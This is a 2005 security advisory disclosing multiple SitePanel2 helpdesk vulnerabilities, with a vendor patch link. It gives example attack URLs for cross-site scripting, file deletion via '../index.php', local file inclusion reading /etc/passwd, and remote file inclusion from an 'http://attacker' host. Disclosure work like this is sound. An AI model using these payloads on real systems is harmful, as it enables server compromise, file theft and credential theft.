sitepanel2.txt

`##########################################################  
# GulfTech Security Research May 3rd, 2005  
##########################################################  
# Vendor : Morgan Harvey  
# URL : http://www.sitepanel2.com/  
# Version : 2.6.1 And Earlier  
# Risk : Multiple Vulnerabilities  
##########################################################  
  
  
  
Description:  
SitePanel2 is a helpdesk / trouble ticket / support system used  
by businesses and individuals alike. There are a number of  
vulnerabilities in SitePanel2, some of which are fairly serious.  
If an attacker is able to successfully exploit these vulnerabilities  
in SitePanel2 he may be able to successfully compromise user accounts  
or completely compromise the target web server. A security patch has  
been released to address these issues and all users are strongly  
encouraged to upgrade their SitePanel2 installations as soon as  
possible.  
  
  
  
Cross Site Scripting:  
Cross site scripting exists in SitePanel2. This vulnerability exists  
due to user supplied input not being checked properly.  
  
http://host/users/main.php?p=5&do=2&v=177%22%3E[XSS]  
http://host/admin/5.php?do=chsev&postid=177&usernamess=test&inadmin=no%22%3E[XSS]  
http://host/admin/5.php?do=chsev2&postid=177&usernamess=test&inadmin=no&newsev=4%22%3E[XSS]  
http://host/admin/5.php?do=chsev&postid=177%22%3E[XSS]&usernamess=test&inadmin=no  
http://host/users/main.php?p=5&do=0&show=closed%22%3E[XSS]  
http://host/admin/0.php?do=ratekb&id=11%22%3E[XSS]  
http://host/users/main.php?p=6&do=0&v=post&id=11&sec_name=Blah%22%3E[XSS]  
  
This vulnerability could be used to steal cookie based authentication  
credentials within the scope of the current domain, or render hostile  
code in a victim's browser.  
  
  
  
Arbitrary File Deletion:  
I found an arbitrary file deletion issue, which depending on server  
permissions may allow an attacker to delete any file on the server.  
  
http://host/admin/5.php?do=rmattach&rm=yes&id=../index.php  
  
Even if the server is running as nobody you can still delete any and  
all attachments you know the name of.  
  
  
  
Directory Traversal Vulnerability:  
Also, there is a local file include vulnerability. An attacker may specify  
directory traversal sequences when calling the "lang" parameter and include  
arbitrary files residing on the local machine.  
  
http://host/users/index.php?lang=en.inc/../../../../../../etc/passwd%00  
  
This issue can be used to read arbitrary files, or include and execute  
arbitrary local files.  
  
  
  
Arbitrary File Upload:  
Nothing very technical here, but an attacker can upload malicious files  
such as php scripts when attaching them to a trouble ticket and execute  
them with the privileges of the target web server.  
  
  
  
Remote File Include Vulnerability:  
SitePanel2 is prone to both remote and local file include vulnerabilities  
which may allow for an attacker to execute arbitrary commands on the victim  
webserver by including malicious files.  
  
http://host/users/main.php?p=http://attacker  
  
Above is an example of how this issue could be exploited. The problem lies  
in the way the "p" parameter is called. It is clearly not sanitized and can  
be used to include arbitrary files from a remote location.  
  
  
  
Solution:  
The developer was contacted some months ago and a new version can be found  
here http://forum.sitepanel2.com/index.php?showtopic=271  
  
  
  
Related Info:  
The original advisory can be found at the following location  
http://www.gulftech.org/?node=research&article_id=00072-05032005  
  
  
  
Credits:  
James Bercegay of the GulfTech Security Research Team  
`